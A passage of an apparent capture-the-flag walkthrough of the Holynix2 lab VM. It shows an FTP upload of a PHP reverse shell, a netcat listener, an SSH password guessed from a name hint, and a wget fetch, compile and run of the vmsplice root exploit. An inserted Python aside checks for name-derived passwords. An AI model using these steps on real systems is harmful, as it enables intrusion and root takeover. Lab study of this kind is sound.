After thinking for a few minutes, I understood that every username corresponds to a subdomain. OK, I need to check the subdomains again with this FTP user login.
I need to change my name server to access the subdomains.
┌─[✗]─[[email protected]]─[~/Desktop/Holy]
└──> ping cbergey.zincftp.com
ping: cbergey.zincftp.com: Name or service not known
┌─[✗]─[[email protected]]─[~/Desktop/Holy]
└──> echo nameserver 192.168.1.88 > /etc/resolv.conf
┌─[[email protected]]─[~/Desktop/Holy]
└──> ping cbergey.zincftp.com
PING cbergey.zincftp.com (192.168.1.88) 56(84) bytes of data.
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=1 ttl=64 time=0.291 ms
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=2 ttl=64 time=0.589 ms
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=3 ttl=64 time=0.620 ms
^C
--- cbergey.zincftp.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2026ms
rtt min/avg/max/mdev = 0.291/0.500/0.620/0.148 ms
Yeah! I can access it. Now upload a PHP file to test.
┌─[[email protected]]─[~/Desktop/Holy]
└──> ftp 192.168.1.88
Connected to 192.168.1.88.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5 allowed.
220-Local time is now 04:55. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.88:root): cbergey
331 User cbergey OK. Password required
Password:
230-User cbergey has group access to:  2002
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful
150 Connecting to port 60441
drwxr-xr-x    3 1031       2002             4096 Dec  6  2010 .
drwxr-xr-x    3 1031       2002             4096 Dec  6  2010 ..
-rw-r--r--    1 1031       2002              220 Dec  6  2010 .bash_logout
-rw-r--r--    1 1031       2002             2940 Dec  6  2010 .bashrc
-rw-r--r--    1 1031       2002              586 Dec  6  2010 .profile
drwxr-xr-x    2 1031       2002             4096 Dec  6  2010 web
226-Options: -a -l
226 6 matches total
ftp> cd web
250 OK. Current directory is /web
ftp> ls -al
200 PORT command successful
150 Connecting to port 37881
drwxr-xr-x    2 1031       2002             4096 Dec  6  2010 .
drwxr-xr-x    3 1031       2002             4096 Dec  6  2010 ..
226-Options: -a -l
226 2 matches total
ftp> put info.php
local: info.php remote: info.php
200 PORT command successful
150 Connecting to port 34115
226-File successfully transferred
226 0.000 seconds (measured here), 52.51 Kbytes per second
20 bytes sent in 0.00 secs (315.0202 kB/s)
ftp> ls -al
200 PORT command successful
150 Connecting to port 54409
drwxr-xr-x    2 1031       2002             4096 Jan  3 12:56 .
drwxr-xr-x    3 1031       2002             4096 Dec  6  2010 ..
-rw-r--r--    1 1031       2002               20 Jan  3 12:56 info.php
226-Options: -a -l
226 3 matches total
Now upload the PHP reverse shell file the same way.
┌─[[email protected]]─[~/Desktop/Holy]
└──> nc -lvp 3333
listening on [any] 3333 ...
connect to [192.168.1.89] from www.zincftp.com [192.168.1.88] 48950
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
 05:00:25 up  2:34,  0 users,  load average: 0.07, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@holynix2:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@holynix2:/$ uname -a
uname -a
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
Yes! I checked the home directories of the SSH login users and found one message. Yo yo, I got the SSH login password for amckinley.
The full name is Agustin Mckinley, with 2ba9 added to it. Therefore the password will be agustinmckinley2ba9.
Time to log in over SSH.
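Both the wordlist attempt earlier in the post (full name, namemash permutations, a numeric suffix) and this hint point at the same weakness: the password is the account's own GECOS name with a short tail. The block below is an added example, not part of the original post or the Holynix VM; it is the check a password policy (or a periodic audit over /etc/passwd plus a candidate password) would run to reject name-derived passwords, in the spirit of cracklib's GECOS test. The sample passwd line is constructed in the format seen on this box and the helper names are my own.

```python
import re

# Digit/symbol substitutions a policy check should undo before comparing,
# so 'Mck1nl3y99' is still recognised as the surname.
LEET = str.maketrans({"4": "a", "3": "e", "1": "i", "0": "o", "5": "s", "@": "a", "$": "s"})


def name_tokens(gecos, username):
    """Lower-cased identity strings a password must not contain.

    Built from the GECOS full name and the login name: each name part,
    first+last joined ('agustinmckinley'), initial+last ('amckinley')
    and last+first ('mckinleyagustin')."""
    full_name = gecos.split(",")[0]          # GECOS may carry ',room,phone,...' fields
    parts = [p for p in re.split(r"[\s.\-_]+", full_name.lower()) if p]
    tokens = set(parts) | {username.lower()}
    if len(parts) >= 2:
        tokens.add("".join(parts))
        tokens.add(parts[0][0] + parts[-1])
        tokens.add(parts[-1] + parts[0])
    return {t for t in tokens if len(t) >= 3}   # drop initials and very short bits


def is_name_derived(password, gecos, username):
    """True when the password contains a name token, ignoring case and
    common digit substitutions; a short suffix such as '2ba9' does not help."""
    pw = password.lower()
    variants = {pw, pw.translate(LEET)}
    return any(tok in v for tok in name_tokens(gecos, username) for v in variants)


def check_passwd_line(passwd_line, password):
    """Apply the check to one /etc/passwd line (user:x:uid:gid:gecos:home:shell).
    Returns (username, True if the password should be rejected)."""
    fields = passwd_line.strip().split(":")
    if len(fields) != 7:
        raise ValueError("not a passwd(5) line: %r" % passwd_line)
    username, gecos = fields[0], fields[4]
    return username, is_name_derived(password, gecos, username)


if __name__ == "__main__":
    # Constructed sample line in the format seen on this box; the first password is
    # the one the post derives from the full name plus a four-character suffix.
    sample = "amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash"
    print(check_passwd_line(sample, "agustinmckinley2ba9"))            # ('amckinley', True)
    print(check_passwd_line(sample, "correct horse battery staple"))   # ('amckinley', False)
```

The substring test is deliberately loose: a policy that only rejects exact matches would still accept `agustinmckinley2ba9`, which is precisely the form the hint on this box describes. For a real deployment the same tokens would be fed to the PAM password-quality module's GECOS check rather than re-implemented, but the logic is the one shown.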
┌─[[email protected]]─[~/Desktop/Holy]
└──> ssh amckinley@192.168.1.88
amckinley@192.168.1.88's password:
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
amckinley@holynix2:~$ sudo -l
User amckinley may run the following commands on this host:
    (root) NOPASSWD: /bin/false
Success. Now I need to get root! The kernel version is 2.6.22 from 2007, an old kernel.
Finally I found the right exploit to root: https://www.exploit-db.com/exploits/5092/
amckinley@holynix2:/tmp$ wget https://www.exploit-db.com/raw/5092/ -O rootme.c --no-check-certificate
--05:25:36--  https://www.exploit-db.com/raw/5092/
           => `rootme.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 6,580 (6.4K) [text/plain]

100%[======================================================================================================>] 6,580         --.--K/s

05:25:38 (677.66 MB/s) - `rootme.c' saved [6580/6580]

amckinley@holynix2:/tmp$ gcc rootme.c && ./a.out
rootme.c:289:28: warning: no newline at end of file
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d6e000 .. 0xb7da0000
[+] root
root@holynix2:/tmp# id
uid=0(root) gid=0(root) groups=100(users)
root@holynix2:/tmp#
Bingo! I got root access. Thanks for reading. Happy hacking.